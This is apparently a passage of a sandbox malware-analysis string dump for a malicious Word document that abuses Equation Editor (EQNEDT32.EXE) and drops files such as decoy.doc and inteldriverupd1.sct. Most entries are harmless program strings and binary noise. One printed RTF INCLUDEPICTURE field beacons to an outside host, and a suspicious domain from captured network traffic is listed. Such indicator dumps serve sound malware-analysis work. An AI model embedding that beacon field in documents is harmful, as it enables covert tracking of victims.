u"xA@T_q64)kuV7t'%;i9s9x,-45xd8?d/Y|t&LILJ`& -Gt/PK!-

Ansi based on Dropped File (~WRC0000.tmp)

U]b65y2izO{]rK[']u4jjKF\kIh_[][#:?W-MLiu\g ]x1<TD`C4P{T6%[yBZJ

Ansi based on Dropped File (decoy.doc)

ubscript

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

unction . . . . . . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

v-%oO$u~W8kX8]nddbKzP]|{ dZGJS90_t$4aJ=yx=84)I;58 duG%*

Ansi based on Dropped File (~WRC0000.tmp)

VarFileInfo

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Version

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

version="1.00"

Ansi based on Dropped File (inteldriverupd1.sct)

Vladimir Script

Unicode based on Runtime Data (WINWORD.EXE )

VS_VERSION_INFO

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

VSA"3(O5$aE'p,#$[G)A*R~t*N7r0q^CBz8~f/1\\R+@N

Ansi based on Dropped File (~WRC0000.tmp)

WinExec

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

Wj>Jf]=Y`YE~}q=j]u3m[tOx?nBm,fbk(x};q|.QK2h^ZC`[GeD~Yq~1CT!qb

Ansi based on Dropped File (~WRC0000.tmp)

word/glossary/settings.xmlUmO0>iIJaSD?Io:;_s

Ansi based on Dropped File (~WRC0000.tmp)

www.dns-verifon.com0

Ansi based on PCAP Processing (network.pcap)

wwwwh

Ansi based on Dropped File (exe.exe.634531026)

wwwwww

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

wwwwwwwwwwwwwwwwwwwwp

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ymbol . . . . . . . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

{$DvxrR@^V?=u]V6))+`{`EVNzx%cdR}`e;tg]T5

Ansi based on Dropped File (~WRC0000.tmp)

{71358FC1-E43B-11D1-A17F-00A0C90AB50F}

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

{\field{\*\fldinst{INCLUDEPICTURE "http://test1.ru/newbuild/t.php?stats=send&thread=0" MERGEFORMAT \\d \\w0001 \\h0001 \\pm1 \\px0 \\py0 \\pw0}}}}

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

}numbernfigureversionhigh

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

~JTe\O*tHGHY}KNP*T9/#A7qZ$*c?qUnwN%Oi4=3N)cbJ

Ansi based on Dropped File (~WRC0000.tmp)

~xM`ijU <8PU 6<+x(5@aG&N,vj,'`&8#oh&w?d<&4*[*[o#]vMST';@5:k&017q8M

Ansi based on Dropped File (~WRC0000.tmp)

~xM`x@ly(AU&pPqv&Pj7NMPK&J#osx@3@88aG#p'[JM7To

Ansi based on Dropped File (~WRC0000.tmp)

Ansi based on Runtime Data (exe.exe )

Ansi based on Runtime Data (WINWORD.EXE )

!"#$%&'%&'(

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

#Shows the contents of the Clipboard

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

%08lX

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

%d,%d

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

%d,%d,%d,%d

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

%ld %s

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

%ld%c%0*ld %s

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

%s - %s

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

%s,%s

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

%s=%s

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

&%d %s

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

&100%

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&200%

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&300%

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&400%

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Apply

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&At %

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Bold

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Bottom

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Columns

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&CopyCtrl+C

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Custom:

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Defaults

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Define...

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Don't show me this again

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Edit

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Equation Editor Help TopicsF1

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&File

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Fonts:

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Full

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Function

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Greek

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Italic

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Math

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Rows

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Size:

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Zoom...

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

(partial order)

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

-Bold

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

-BoldItalic

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

-Italic

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

. . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

. . . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

.C. Greek . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

.C. Greek . . . . . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

0110900

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

0123456789ABCDEF

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

0Your equation requires too many different fonts.+Internal Error #%d. Contact Design Science.

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

1Q3g3

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

2000 Microsoft Corporation

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

3 3<7

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

3$3(3

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

4$4,444<4D4L4T4\4d4

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

7V8a8

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

<)?>?

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

<-<<<N<]<w<

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

=2>D>h>

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

>'?O?

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

?&?0?

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

?8?I?

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

?`?i?

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

?T?b?m?

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

[OptionsTextENG]

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

\layout.inf

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

_kv@fkv

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

_lclose

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

_llseek

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

_lread

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

_lwrite

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

a powerful upgrade to Equation Editor with many additional features.Do you want to find out more about MathType?

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

A&llCtrl+A

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+-

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

ABDFILORSX

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

able as this equation is being edited in a documentmScales the editing view to another magnificationNot available as this equation is being edited in a document

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

abnormal program termination

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

About Microsoft Equation Editor

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

AboutMathType

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

acing...

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Active

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

alFilename

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Align &Left

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ariable . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Arial

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Arrow (both directions)

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

At &=

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ation

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ation in %s

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

atrix-Vector . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Ba&seline

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ber . . . . . . . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

can't find chunk to free

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Can't Undo

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Cancel

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Ce&nter

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

CG Times

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

CG Universe

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Character Format

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

CloseHandle

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

CLSID\{0002CE02-0000-0000-C000-000000000046}\DefaultIcon

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

CLSID\{0002CE02-0000-0000-C000-000000000046}\LocalServer32

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

ColonSemicolon

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

colortbl

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

CompanyName

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Coproduct with no limits Coproduct with underscript limit

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

CoproductLambda bar

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Courier

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

CreateInsitu Failed

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

cript ellMinus or plus

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

CustomZoom

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

DenomDepth

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Design Science, Inc. 1990-2000

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

DISPLAY

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

DOMAIN error

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

Double arrow (both directions)

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Double arrow under-bar

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Double arrow up and down

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Down diagonal ellipsis

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

DS Equation

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

E&xit and Return to %s

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Editor

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

eeintl.dll

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Ellipsis

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

em\currentcontrolset\control\keyboard layout

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Embed Source

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Embedded Object

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

embedding

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

EmbellGap

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

enter

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

EqnEdt32.EXE

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

eqnedt32.reg

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

EqnFrameWinProc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

EQNINSITUCLASS

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

EQNWINCLASS

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

equation

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Equation

Unicode based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Equation Editor

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Equation Editor 2.0 Windows Application

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

Equation Editor Tip

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Equation Editor's equation memory is running low. Close some Equation Editor windows or reduce the contents of open Equation Editor windows, perhaps by transferring them to documents.

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Equation Native

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Equation(Unable to write preferences to registry.

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Equation.3\protocol\StdFileEditing\server

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Equation3

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

EquationEditorFilesIntl_1033

Unicode based on Runtime Data (EQNEDT32.EXE )

EquationWindow

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ExitProcess

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

ext . . . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ext . . . . . . . . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Fatal Exit

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

FatalAppExitA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

FenceOver

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Fences

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

field

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

FindResourceA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

fldinst

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

fldrslt

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

FltToolbarWinProc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

FMDFontListEnum

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

FMDFontProtoEnum

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

Fonts

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

fonttbl

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

footer

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

footerf

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

footerl

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

footerr

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

ForceOpen

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

FractBarOver

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

FractBarThick

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

FreeLibrary

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

FreeResource

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

ft Equation Editor

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Function

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

galCopyright

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

General

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

GetACP

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetActiveWindow

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

GetCommandLineA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetCPInfo

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetCurrentProcess

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetLastActivePopup

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

GetLastError

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetLocaleInfoA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetLocalTime

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetModuleFileNameA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetModuleHandleA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetProcAddress

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetProfileStringA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetStartupInfoA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetSystemDefaultLangID

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetSystemDirectoryA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetSystemTime

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetTickCount

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetTimeZoneInformation

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetVersion

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetWindowsDirectoryA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GlobalAlloc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GlobalFlags

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GlobalFree

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GlobalHandle

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GlobalLock

